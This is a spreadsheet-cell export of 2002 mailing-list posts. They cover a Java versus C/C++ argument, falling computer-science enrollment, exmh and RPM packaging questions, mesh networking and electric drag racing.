&gt; mostly in the dark for half the year, wouldn't *you* like a bit of 
&gt; internet distraction?   They've already done the obvious and fiber-ringed 
&gt; the island.BTW did they do the same as they did in Ireland, namely: spend millions
burying copious miles of dark fibre, then neglect to provide any way of
actually hooking it up to any ISPs? ;)--j. (frustrated)</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 1 Sep 2002, Bill Stoddard wrote:&gt; &gt;
&gt; &gt; "Red Hat Linux Advanced Server provides many high end features such as:
&gt; &gt; Support for Asynchronous I/O. Now read I/O no longer needs to stall your
&gt; &gt; application while waiting for completion."
&gt;
&gt; Can you provide a reference?  I could find it myself but I'm too lazy.Well,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http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
Well Beberg, unless you're really into Anime and actually hold true
that dead people can send email, I think Geege's subject is just dandy.
Especially since she removed herself from the hive that is aol (and
placed herself unto another, but hey :-))Geege:  I think its cute when he worries like that, don't you?
:)*ducks and runs*(bonus FoRK points if Adam knows what anime i'm refering to)BB
</t>
  </si>
  <si>
    <t>beberg, would you rather mrsrobinson@bellsouth.net?into plastics too,
schuman-----Original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dandy.Funny you should mention that, as I just came back from refilling
the green coolant in my Navi. &gt; (bonus FoRK points if Adam knows what anime i'm refering to)I guess I don't get any points, do I? No, didn't think so.- JoeP.S. We've just started watching Boogiepop Phantom...-- 
The Combatant State is your father and your mother, your only
protector, the totality of your interests. No discipline can
be stern enough for the man who denies that by word or deed.</t>
  </si>
  <si>
    <t>Reza B'Far (eBuilt) wrote:
 &gt; problems.... Why do most computer scientists insist on solving the
 &gt; same problems over and over again when there are some many more
 &gt; important and interesting problems (high level) to be solved ?????Amen!Doing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</si>
  <si>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 xml:space="preserve">"Once we thought of the Internet as this thing with infinite capabilities.
It was basically just a fad that came along."Missing from the article is the percentage of foreign enrolement, I would
bet the numbers of students from Asia (China specificly) has gone up quite a
bit, and is the only thing keeping the overall numbers from plummiting."you can't get the chicks with that anymore."About time us geeks were outcasts again. I was getting sick of hearing about
geeks breeding and ending up with autistic children - proving that
intelligence is a genetic defect and a "do not breed" flag.)- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com-----------------Tech's Major Decline
College Students Turning Away From Bits and BytesBy Ellen McCarthy
Washington Post Staff Writer
Tuesday, August 27, 2002; Page E01If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hunger.But as Yandziak attends his first college classes this week, he's harboring
different academic ambitions. The Ashburn native says he wants to do
something more social and more interesting than working with computers.Besides, he said while packing for a Charlottesville dormitory room, "you
can't get the chicks with that anymore."The tech industry's financial problems are enough to bankrupt the dreams of
some fair-weather students. But now there's another consequence of the tech
bust: Enrollment growth in undergraduate computer science departments has
come to a halt.The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begins.The word is out among department deans that the bust's fallout has trickled
into the classroom, said Maria Clavez, president of the Association of
Computing Machinery."I've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effect."At Virginia Tech, enrollment of undergraduates in the computer science
department will drop 25 percent this year, to 300. At George Washington
University, the number of incoming freshmen who plan to study computer
science fell by more than half this year.Interest in undergraduate computer science programs had grown rapidly in the
past decade. In 1997, schools with PhD programs in computer science and
computer engineering granted 8,063 degrees, according to the Computing
Research Association. The numbers rose through 2001, when 17,048 degrees
were awarded.The Labor Department projects that software engineering will be the
fastest-growing occupation between 2000 and 2010, with other
computer-related industries trailing close behind.But in the short term that growth may slow, based on the changes among
college students. For example, 900 of the 2,000-plus undergraduates studying
information technology and engineering at George Mason University were
computer science majors last year. This year the enrollment in that major is
down to 800, although a newly created and more general information
technology major has attracted 200 students."Having it ease off for a while is a bit of a relief," said Lloyd Griffith,
dean of George Mason's information technology and engineering school.
"Particularly with the field as it has been, they don't want to spend four
years on something and then not get a job."Freshman enrollment for the University of Maryland's computer science major
is expected to be about 167 this fall, down from 329 last year. Maryland
decreased its total freshman enrollment by 11 percent, but that alone does
not account for the drop, said Steve Halperin, dean of Maryland's College of
Computer, Mathematical and Physical Sciences."We are seeing a decrease in the number of freshmen who are declaring their
interest in pursuing computer science as a major," Halperin said. "That's a
factual statement. But I would say that at this point . . . we don't expect
to see a decrease in the number of graduates. Many of the kids who are no
longer expressing an interest in majoring in CS would have fallen off."Yandziak, who began at the University of Virginia on Saturday, is not
convinced that's the case. He graduated in the top 5 percent of his class,
with a 3.9 grade-point average, and nailed the highest possible score on his
advanced-placement exam in computer science."All of my classes have been easy for me. Math and sciences were always fun,
so I looked for professions in which I could use those things," Yandziak
said. "I'm just not sure I want my life to be immersed in [technology]. I
want to do something that will contribute to the practical world."Harris N. Miller, president of the Information Technology Association of
America, said the last time there was a dearth of computing professionals,
salaries skyrocketed and workers benefited from the labor shortage."There was a tremendous imbalance in the late '90s; potentially you have the
same sort of thing going on right now. People are saying, 'I don't need this
kind of IT training right now,' " Miller said. "Our concern as an industry
is that if they begin to again see major declines in enrollment, down the
road four years, as the economy picks up, once again companies are going to
find themselves in a shortage situation."Economic potential weighs heavily in many student career choices, but other
factors, including program difficulty, personal interests and social
influences, also come into play, said Judy Hingle, director of professional
development at the American College Counseling Association. The perception
of computer science as an isolating, "nerdy" profession is one that many in
the industry have tried to squelch. That stereotype went underground during
the tech bubble but reemerged during the bust."All the hipness is gone," Yandziak said. "Once we thought of the Internet
as this thing with infinite capabilities. It was basically just a fad that
came along."Lamont Thompson, a recent graduate of Calvin Coolidge Senior High School in
the District, is headed to Morehouse College in Atlanta to study business
marketing, with the intention of going into real estate development."Technology comes natural to people my age; it's not fascinating anymore,"
Thompson said. "To be honest with you, when I think computer science, I
think of some guy sitting behind a computer all day in a dark room. It's a
necessity, but I wouldn't take it any further."
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 1 Sep 2002, Joseph S. Barrera III wrote:&gt; Reza B'Far (eBuilt) wrote:
&gt;  &gt; problems.... Why do most computer scientists insist on solving the
&gt;  &gt; same problems over and over again when there are some many more
&gt;  &gt; important and interesting problems (high level) to be solved ?????
&gt;
&gt; Amen!Like what exactly? All the problems are in chemisty and physics and biology
and mathematics. We're just enablers :)&gt; Doing it in an (unecessarily) harder way does NOT make you more of a man
&gt; (or less of a kiddie).Yes, but doing it an order of magnitude or 2 easier does :) Which with the
way things are now, is not hard at all to do.- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 1 Sep 2002, Mr. FoRK wrote:&gt; &gt; 6.  Hardware is getting so fast that I'm not sure if the performance
&gt; &gt; difference between Java and C/C++ are relevant any more.
&gt;
&gt; When out-of-the-box parsing &amp; transform of XML in java is 25x slower than
&gt; C++ on the same hardware then it does matter.Yea, and that on top of the 100x of all the parsing engines over just
bigendian'ing it and passing the data (5x+++) in the raw. Then it REALLY
matters.- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sunday 01 September 2002 08:43 pm, Reza B'Far (eBuilt) wrote:
&gt; 3.  Java is not just a programming language!The astounding thing about java is that despite all of the many significant 
points in its favor, it still manages to suck, and break across JVMs.I was really looking forward to being able to use a better language like 
java and get it compiled to real platform-specific binaries via the GNU 
compiler collection.   But this seems to have never really gotten anywhere 
because it would require porting or reimplementing libraries, which are 
probably not source-available or tolerably licenced.   When I looked at 
what I had to do to gcc and link "hello world," I lost interest.Who the hell is writing the runtimes, anyway?   Why are Perl/Python/Ruby 
more reliable?   In a world where the Macs all ran emulated 68K code 
utterly reliably, it's just hard to accept that there can't be a single 
portable JVM that just works.My opinion is biased because of the disgraceful state of non-Windoze 
browser java implementations.Eirikur
</t>
  </si>
  <si>
    <t>use this address instead, please.prerogatively,
geege</t>
  </si>
  <si>
    <t>On Mon, Sep 02, 2002 at 03:19:13AM -0400, Eirikur Hallgrimsson wrote:
&gt; My opinion is biased because of the disgraceful state of non-Windoze 
&gt; browser java implementations.Horrors. Applets are kinda sucky. The cool kids are using Java to write
server applications, not browser craplets.The giggle-inducing irony of the whole Java thing is how Sun's strategy
backfired. They produced a platform that was supposed to dwell on the
client side, where it would commoditize those clients. Instead, it turns
out to be the perfect language to write server applications in, and it has
successfully commoditized servers. Ooops!-- 
njl</t>
  </si>
  <si>
    <t xml:space="preserve">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platforms...Reza B'Far-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Adam
L. Beberg
Sent: Sunday, September 01, 2002 9:01 PM
To: Mr. FoRK
Cc: fork@spamassassin.taint.org
Subject: Re: Java is for kiddies
On Sun, 1 Sep 2002, Mr. FoRK wrote:&gt; &gt; 6.  Hardware is getting so fast that I'm not sure if the performance
&gt; &gt; difference between Java and C/C++ are relevant any more.
&gt;
&gt; When out-of-the-box parsing &amp; transform of XML in java is 25x slower than
&gt; C++ on the same hardware then it does matter.Yea, and that on top of the 100x of all the parsing engines over just
bigendian'ing it and passing the data (5x+++) in the raw. Then it REALLY
matters.- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
Of course they had to do this AFTER we purcahsed these all on vhs, and yes
it is now run by the great evil empire known as disney...but we got the
new School House Rocks DVD anyway and man is it an amazing item.First off , my 8 year old has been singing them since she was 6. Second
off, these are much easier to rip to divx and mp3. Third, new songs,
remastered originals and other dvd goodies. Its a 2 dvd set so its well
worth the 17$ we paid for it.Even if you dont have kids, run do not walk to pick this one up.Man, I would sure love to have a *nix Rocks for the kids.
</t>
  </si>
  <si>
    <t>&gt;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that.I've done a bunch of Java and haven't run into huge problems running the
same bytecode across Solaris or Win2K.
What actual problems have people actually run into. Actually.</t>
  </si>
  <si>
    <t xml:space="preserve">-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
Robert Harley
Sent: Monday, September 02, 2002 2:55 AM
To: fork@spamassassin.taint.org
Subject: RE: Java is for kiddies
Reza B'Far wrote:
&gt;This thread kind of surprises me... I started coding with C, then C++, and
&gt;moved on to Java... And, I think that:
Robert Harley wrote:
&gt;Looks like a case of "MY experience is comprehensive, YOUR'S is
&gt;anecdotal, THEY don't know what they're talking about".Well, I sure don't claim that... I think most people on Fork probably have
more programming knowledge than I do... There's lots of experience out
here...Reza B'Far wrote:
&gt;1.  The people who pay the wages don't give a flyin' heck what programming
&gt;language you write things in... they just want it to work.
Robert Harley wrote:
&gt;In my experience, they do care.  It has to work certainly, and in
&gt;particular it has to work with what they've already got, and it has to
&gt;work on client's systems.
&gt;My limited experience of Java started a few years ago when support on
&gt;Linux was so terrible that I ran away screaming and haven't come back yet.Well, I think until recently, support for most things on Linux was kind of
shady... Things have got much better... You're right in that the JDK used to
suck on Linux... But then, IMHO, Linux is still maturing.... or at least
development tools for Linux are maturing... I've been developing a few
server side apps that run on Linux recently with JDK 1.3.x and they've had
no problems with great performance.Robert Harley worte:
&gt;Microsoft has announced that they plan to remove Java from Windows.
&gt;They took it out of XP already and it has to be installed with a
&gt;service pack.  Somehow, I can't imagine them removing the ability to
&gt;run C programs.Hmmm... Do you really think that MS is pulling out Java because it's a "Bad"
programming language or application platform?  You don't think this has
anything to do with .NET being a competitor to Java do you?  Or that MS has
basically copied Java (with some additional features) and called it C#?
Isn't that alone an indication that they actually DO think that a VM is the
right way to go for most high level applications?Reza B'Far wrote:
&gt;2.  C and C++ forces the developer to solve problems such as memory
&gt;management over and over again.
Robert Harley wrote:
&gt;Can't say I spend any noticeable amount of time on memory management
&gt;issues, apart from the fact that I frequently need &gt; 4 GB.Hmmm again.... You're telling me that you've never had a nasty bug that took
you a couple of days to track down that had to do with a memory leak?  I am
not the best C/C++ programmer... not even close... But I've known really
good ones... and even they have nasty bugs that have to do with memory
management, however occasional they may be.&gt;It's about design patterns, architecture, high level stuff...
Robert Harley wrote:
&gt;If your problem just requires application of a "design pattern" to solve,
&gt;then it's trivial anyway irrespective of language.Wow!  So you're telling me that unless the application involves
bit-counting, it's trivial?  What about the application itself?  What about
high level problems such as task distribution, work-flow, etc.?  Aren't most
high level problems solved with high level solutions like design patterns?
Or do you solve high level problems by writing optimal C/C++ code?  For
example, do you think that most people working on collaboration frameworks
(there are lots of them on this list), are working on writing an operating
system with assembly that provides for a collaborative environment?&gt;I am amazed by the amount of time wasted by people talking about low
&gt;level problems that have been solved 10 million times over and over
&gt;and over again...
Robert Harley wrote:
&gt;You appear to be gratuitously asserting that C programmers waste time
&gt;on irrelevant low-level problems and Java programmers don't.  Depends
&gt;entirely on the programmer, not the language.I can see how you could infer this. However, what I believe to really be the
case is that Java is one of the best languages for writing large
applications with many components that involves the collaboration of more
than three programmers.  In those cases, it's always very hard to get the
programmers to agree on API's, memory management techniques, etc.  With
Java, the JCP takes care of the discussions so that you don't sit around in
a long meeting trying to decide what API to use to hook up to a database
(JDBC) or a messaging bus (JMS).
&gt;3.  Java is not just a programming language! It's also a platform...
Robert Harley wrote:
&gt;Buzzword.YIKES!  Have you written db code with C/C++ for different databases (just an
example)?  Tried porting a persistence layer from Windows to Unix?  Say you
have Informix running on Solaris and you want to port to Windows with MS SQL
(bad idea...but for the sake of the example), would you rather deal with
JDBC port or C/C++ port that uses Informix drivers and now you have to use
ODBC?
&gt;a monolithic set of API's or a crap load of different API's slicing
&gt;and dicing the same problems 50 different ways?
Robert Harley wrote:
&gt;Unsupported assertion.So, are you saying that there is a standard set of API's for C/C++ for
everything? (aside to the minimal ANSI stuff).  Is there a standard way of
dealing with C/C++ applications for various domain problems (messaging,
database persistence, etc.) that rivals Java?  I'd like to know if there is
one accepted by everyone who writes C/C++... In that case, I claim
ignorance...Not suggesting that Java is the golden hammer.... Just that C/C++ is
overkill for most things... I even coded in VB... But VB is a true disgrace
to programming... It's just lame... Java is Object Oriented... (no
flame-mail from the anti-OO people please... that is a religious
discussion...) and relatively clean... And I don't think that every "Kid"
can write a well designed Java program.  Kids typically don't understand
various design patterns and principles... To my experience, they actually
tend to think more of the low level problems, wanting to rewrite and
reinvent the world... a tendency that is much more possible, IMHO, in C/C++
than in Java due to existence of standard API's.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2 Sep 2002, Reza B'Far (eBuilt) wrote:&gt; Hmmm again.... You're telling me that you've never had a nasty bug that took
&gt; you a couple of days to track down that had to do with a memory leak?  I am
&gt; not the best C/C++ programmer... not even close... But I've known really
&gt; good ones... and even they have nasty bugs that have to do with memory
&gt; management, however occasional they may be.OK, noone has been tool-less for memory management for a LONG time. Most
systems you just add a flag and memory is tracked (that's how i've always
done it) or worst case yuo have to run it through one of the 2.3E7 tools
where you simply recompile and it it tells you where the leaks are.Memory management is a non-issue for anyone that has any idea at all how the
hardware functions. Granted, this takes 30 minutes to go over, and so is far
beyond the scope of the "Learn Java in 90 minutes without thinking" book
every Java programmer learned from.- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2 Sep 2002, Reza B'Far (eBuilt) wrote:&gt;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CPUs?Is there anyone out there actually doing anything new that actually IMPROVES
things anymore, or are they all too scared of the fact that improvements put
people out of work and cut #1 is the creators...- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Sunday I drove from Portland down to the Woodburn Dragstrip to check out 
the NEDRA Nationals. The electric cars, motorcycles and dragsters had some great times and I 
ended up with a few pics and a nice deep burn...John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run.John also took out a replica 1908 Oldsmobile for a respectable 47mph 
run. (Remember, we started out with electric cars.)Near the end of the day, Kilacycle took the track with an amazing 111mph 
run. Talk about a crotch rocket....Ross...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
</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</si>
  <si>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signature.Is it possible? I am using sedit for my messages.Thanks.
Ulises&gt;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</si>
  <si>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What's the trick again to have it default to showing text/plain instead of
html?--Harlan_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; On Sat, 24 Aug 2002, "Harlan" == Harlan Feinstein wrote:  Harlan&gt; What's the trick again to have it default to showing
  Harlan&gt; text/plain instead of html?In ~/.exmh/exmh-defaults add:*mime_alternative_prefs: text/plain text/enriched text/richtext text/htmlOrder possible alternatives from _your_ most preferred to least
preferred.--Hal
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Thu, 22 Aug 2002 10:04:06 -0500
    From:        Chris Garrigues 
    Message-ID:  &lt;1030028647.6462.TMDA@deepeddy.vircio.com&gt;  | hmmm, I assume you're going to report this to the nmh folks?Yes, I will, sometime, after I look at the nmh sources and see what
they have managed to break, and why.But we really want exmh to operate with all the versions of nmh that
exist, don't we?   The patch to have exmh do the right thing, whether this
bug exists, or not, is trivial, so I'd suggest including it.Patch follows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
  </si>
  <si>
    <t xml:space="preserve">    Date:        Fri, 23 Aug 2002 10:58:20 -0500
    From:        Chris Garrigues 
    Message-ID:  &lt;1030118301.3993.TMDA@deepeddy.vircio.com&gt;  | Interesting...I don't think this was my bug.
  | It appears that Msg_Change was asked to change to message "-".Something like that is quite possible, but perviously typing nonsense
in didn't cause tracebacks, and now it does, and the traceback came
from the sequence code...Perviously this would have just caused red messages in the status
line complaining about my lousy typing.   That's probably what it
should keep on doing (the "red" part isn't important obviously..)kre_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t>Today an apt-get upgrade holds back php (and submodules, like php-imap). 
  Running an apt-get install php to see what's up, I get:#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upgraded.Anyone have an idea what the heck RedHat did here, and why we're now 
trying to install a ton of crap I don't want?  (I'm hoping someone else 
has chased this down and could save me time... ;) )thx,
-te-- 
Troy Engel, Systems Engineer
Cool as the other side of the pillow
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Thu, 2002-08-22 at 19:10, Troy Engel wrote:
&gt; Today an apt-get upgrade holds back php (and submodules, like php-imap). 
&gt;   Running an apt-get install php to see what's up, I get:
&gt; 
&gt; # apt-get install php
&gt; Processing File Dependencies... Done
&gt; Reading Package Lists... Done
&gt; Building Dependency Tree... Done
&gt; The following extra packages will be installed:
&gt;    curl-devel imap imap-devel mysql mysql-devel php-imap php-ldap postgresql
&gt;    postgresql-devel postgresql-libs pspell-devel ucd-snmp-devel 
&gt; ucd-snmp-utils
&gt;    unixODBC unixODBC-devel
&gt; The following NEW packages will be installed:
&gt;    curl-devel imap imap-devel mysql mysql-devel postgresql postgresql-devel
&gt;    postgresql-libs pspell-devel ucd-snmp-devel ucd-snmp-utils unixODBC
&gt;    unixODBC-devel
&gt; The following packages will be upgraded
&gt;    php php-imap php-ldap
&gt; 3 packages upgraded, 13 newly installed, 0 to remove(replace) and 1 not 
&gt; upgraded.
&gt; 
&gt; Anyone have an idea what the heck RedHat did here, and why we're now 
&gt; trying to install a ton of crap I don't want?  (I'm hoping someone else 
&gt; has chased this down and could save me time... ;) )
&gt; rh bugzilla 72007thats the answer-sv_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Thu, 2002-08-22 at 19:10, Troy Engel wrote:&gt; Anyone have an idea what the heck RedHat did here, and why we're now 
&gt; trying to install a ton of crap I don't want?  (I'm hoping someone else 
&gt; has chased this down and could save me time... ;) )I'm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it's ok.-- 
Chris Kloiber
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Hi everybody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7.3.I visited the web site Freshrpms, I congratulated Thias for his work.And I subscribed to this list for to know more about Red Hat and RPMs' news.Pleased to read U soon.
Gilles (Nice, South of France)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>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Alsa?Regards,LanceOn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&gt;   Date 08/24/2002 - 06:38:03 pm
&gt;   Subject Re: When are we going to get....
&gt; ----
&gt; &gt; From:  Angles  Puglisi 
&gt; To: limbo-list@spamassassin.taint.org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but indeed you still have to patch and
&gt; &gt;&gt; recompile your kernel.
&gt; &gt;
&gt; &gt;Not so.  Alsa is build-able independently of the kernel.
&gt; &gt;
&gt; &gt;&gt; Maybe some day I'll try ALSA (never done it yet), and that day you can
&gt; &gt;&gt; expect all needed packages to appear on freshrpms.net :-)
&gt; &gt;
&gt; &gt;I'd be interested in working with you on that if you want those
&gt; &gt;packages.
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt;_______________________________________________
&gt; &gt;Limbo-list mailing list
&gt; &gt;Limbo-list@redhat.com
&gt; &gt;
&gt; 
&gt; --
&gt; That's "angle" as in geometry.
-- 
:
####[ Linux One Stanza Tip (LOST) ]###########################Sub : Extracting lines X to Y in a text file         LOST #261Use sed ... Syntax: [$sed -n 'X,Yp' &lt; textfile.txt]. Following
will extract lines 5-10 from textin.fil to textout.fil ... 
$sed -n '5,10p' &lt; textin.fil &gt; textout.fil########################################
:
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, ""Angles" wrote :&gt; FYI, This is how I make my ALSA rpms ... some people on the (null) list
&gt; did not realize it was pretty easy.Thanks Angles! I really think I'll give ALSA a shot fairly soon then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</si>
  <si>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Mon, Aug 26, 2002 at 07:14:54PM +0200, Matthias Saou wrote:
&gt; I've repackaged the new gkrellm 2.0.0 which is now ported to gtk2
&gt; (woohoo!). Unfortunately, the plugins are incompatible with the
&gt; previous 1.2.x ones, and since not many/all have been ported yet, I
&gt; prefer not to release the package on the main freshrpms.net site for
&gt; now.You could go the same way as the others and call it gkrellm2 and
conflict with v1 if the executables or paths are the same.-- 
Hey, you're right. I don't want to call a destructor on my objects,
I want to call a *destroyer*. Gozer has come for your memory,
little PersistentNode!
		-- Joel Gluth 
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Mon, 26 Aug 2002 19:14:54 +0200, Matthias Saou  wrote:&gt; Hi all,
&gt; 
&gt; I've repackaged the new gkrellm 2.0.0 which is now ported to gtk2
&gt; (woohoo!). Unfortunately, the plugins are incompatible with the previous
&gt; 1.2.x ones, and since not many/all have been ported yet, I prefer not to
&gt; release the package on the main freshrpms.net site for now.
&gt; 
&gt; For those of you who'd like to try it out, you can grab it here :
&gt; http://ftp.freshrpms.net/pub/freshrpms/testing/gkrellm/
&gt; 
&gt; I think the themes are still compatible, but haven't tried to install some
&gt; with 2.0.0 yet.
&gt; Last note, the above packages are for Valhalla. And yes, although GNOME 2
&gt; is not in Valhalla, gtk2 and glib2 have been from the very beginning! ;-)    Sweet, dude- I was really hoping it'd be out sooner or later; thanks a bunch!------------------------------------------------------------------------
Brian FahrlÃ¤nder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http://www.guardian.co.uk/Archive/Article/0,4273,4477138,00.html_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>&gt; made. Other than that, I bet you could do non-root. The following can
be scripted
&gt; easily.
&gt; 
...
&gt; 2. unpack them somewhere.
&gt; 3. for each of them, go to the top directory of the unpacked tarball,
and do
&gt; ../configure, then look in (I'm going by memory) TOPDIR/utils/* you
should see a spec
&gt; file there. Do this for the 3 tarballs and you get 3 spec files.
&gt; The above steps can all be performed "automatically",
if the .spec files are updated to include the necessary
macros in the %prep (%setup -q) and %build stages.
This would make the building of the .rpm files less
error prone and more self-contained, and it would be
somewhat self-documenting.---
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message -----
From: "Adam L. Beberg" 
&gt;
&gt; Memory management is a non-issue for anyone that has any idea at all how
the
&gt; hardware functions.
In theory there is no difference between theory and practice. In practice
there is.
</t>
  </si>
  <si>
    <t xml:space="preserve">
http://www.guardian.co.uk/Print/0%2c3858%2c4489999%2c00.htmlMaking a mesh on the moveA new way to give us fast mobile net access spells further trouble for 3G, 
reports Peter RojasPeter Rojas
Thursday August 29, 2002
The GuardianImagine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coverage.As the number of mobile phones soars, and wireless PDAs, laptops, and 
other devices begin to crowd the spectrum, this approach to wireless 
networking may be inevitable.Mesh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connection.Because mesh networks use Wi-Fi, the equipment and infrastructure needed 
to create them is cheap and readily available. Instead of building 
cellular phone towers that often cost hundreds of thousands of pounds, all 
that is needed to get a network going are wireless access points (around 
Â£100 now) placed strategically around town to relay traffic, and the 
proper software. Existing laptops and PDAs can be mesh-enabled by 
software.It also means that anyone could set up their own mobile phone network. 
Unlike with 3G cellular, the part of the spectrum that Wi-Fi operates on 
is unregulated in the US, Britain. The mobile phone companies are none too 
pleased about this, especially since many of them spent billions of pounds 
acquiring 3G licences.All that's needed are cheap relays and mobile phones equipped to connect 
to the network. With every additional customer that signs up coverage gets 
better, instead of getting worse, as is the case with mobile phone 
networks.But things get very interesting when you realise that when you have 
high-speed internet connections everywhere, and everyone's laptops, PDAs, 
and mobile phones are connected together at blazingly fast speeds, sharing 
music, movies, or whatever else becomes ridiculously easy. When 
UltraWideBand hits, all of this will just accelerate.At 400Mbps, copying a pirated copy of the Lord of the Rings from the 
person sitting across from you at the cafe would take about 15 seconds. 
Sooner or later, playgrounds will be filled with kids swapping files of 
their favourite songs, movies, and video games.But the first mesh networks are not likely to be available to consumers. 
MeshNetworks has no plans to offer its own high-speed wireless service. 
Instead the company plans to sell its technology to others, such as cities 
that want to provide wireless internet to police, fire, and public works 
employees, or businesses that want to establish wireless networks on the 
cheap. Moteran has similar aspirations for small businesses and for 
enterprise networks.The first place average users may use the technology is when it is 
incorporated into vehicles, enabling motorists to access the internet at 
high speeds, which both companies see happening soon.When will you be able to wander around town with a 6Mbps connection in 
your pocket? It's too soon to say, but just as broadband internet service 
was initially available only to businesses and universities, eventually 
someone will see the profit in bringing mesh networking to the masses.
</t>
  </si>
  <si>
    <t>On 2 Sep 2002, RossO wrote:&gt;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run.Battery pack, huh what???You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Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2 Sep 2002, Adam L. Beberg wrote:&gt; Battery pack, huh what???
&gt; 
&gt; You dont use batteries for a 1/4 mile run, you use capacitors. MANY timesActually, you use both.&gt; the energy density, and you can get the energy out fast enough. Note thatNo,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afterwards.&gt; the battery packs are fully swapped out for recharging after each run
&gt; anyway, just like a gas dragster is refueled, so this wouldnt be cheating.
&gt; 200 MPH should be no problem.I don't see any reason why EVs shouldn't dominate dragster runs. The
traction is the limiting factor, not motor power. You can basically put
the motors into wheelhubs mounted on a composite frame, and dump juice
into them until they melt, which will be some 100 sec downstream. Plenty
of time to smoke anything.Of course, it doesn't roar, and spew smokage, so it won't happen.
</t>
  </si>
  <si>
    <t xml:space="preserve">
I stand corrected --- I'd thought I'd seen a display there listing in
the Ben Franklin museum which showed them as ranging in age from 19 to
just over 30 for the oldest, most in their early twenties.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t>&gt; Another thing to note about Australia is that, while the highest income
&gt; tax bracket (47%) isn't *that* high, it kicks in at around USD33,000.and it looks like PPP for USD 33k is only
about USD 50k*, at least in Big Macs:
Australia	 A$3.00 USD 1.62	-35%
US		  $2.49 USD 2.49
Switzerland	SFr6.30 USD 3.81	+53%Interestingly enough, although housing in
Perth seems cheap, housing in Switzerland
doesn't seem to be as expensive as the Big
Macs would imply.-Dave* which still doesn't sound bad, if one
can convert urban CA equity into free and
clear Oz ownership.</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 3 Sep 2002, Russell Turpin wrote:&gt; For the most part, these were angry, middle-aged men. A column in this
&gt; table shows their age at the time:Mainly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US.Now we give rich men who dont want to pay any taxes corporations to run,
with enough writeoffs and loopholes that they dont have to pay any :)- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t>I used Async IO on System V in the '87, '88 time frame.  I did it that
way cause I thought it was cool to see if I could keep the tape
spinning.I can believe Linux is catching up to this, but some ability to do async
IO already existed in the UNIX world.John Hall
13464 95th Ave NE
Kirkland WA 98034
&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Adam
&gt; L. Beberg
&gt; Sent: Saturday, August 31, 2002 7:35 PM
&gt; To: fork@spamassassin.taint.org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
  </si>
  <si>
    <t>On Tue, 2002-09-03 at 16:31, Adam L. Beberg wrote:&gt; It was a great many years before their were federal taxes in the US.And during said period there were more than a few serious depressions.
Amazing what economies tend to do with or without taxes.Luis</t>
  </si>
  <si>
    <t xml:space="preserve">Congrats, in the end...
&gt; "If they didn't have Max, they might have succumbed, because PayPal was 
&gt; susceptible to fraud and money laundering, and Max tightened them up,"http://www.infoworld.com/articles/ct/xml/02/09/02/020902ctspotlight.xmlSecure and at ease
ByÂ Jack Mccarthy
August 30, 2002 1:01 pm PTMAX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ransom.Not bad for a 27-year-old kid from Ukraine.A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company."This company was founded on the notion of security value," Levchin 
says. "Peter Thiel and I shared that vision from the very beginning."Thiel concentrates on company business matters, whereas Levchin remains 
focused on security, which he says is the key to the company's good 
fortune."I explain [PayPal] as a security company posing as a transaction 
processor," Levchin says. "We spend a lot of time designing security so 
it doesn't step on the toes of convenience and not the other way around. 
The trade-off is fundamental."Mountain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review.Levchin says he will stay at PayPal as it merges with eBay. "There are 
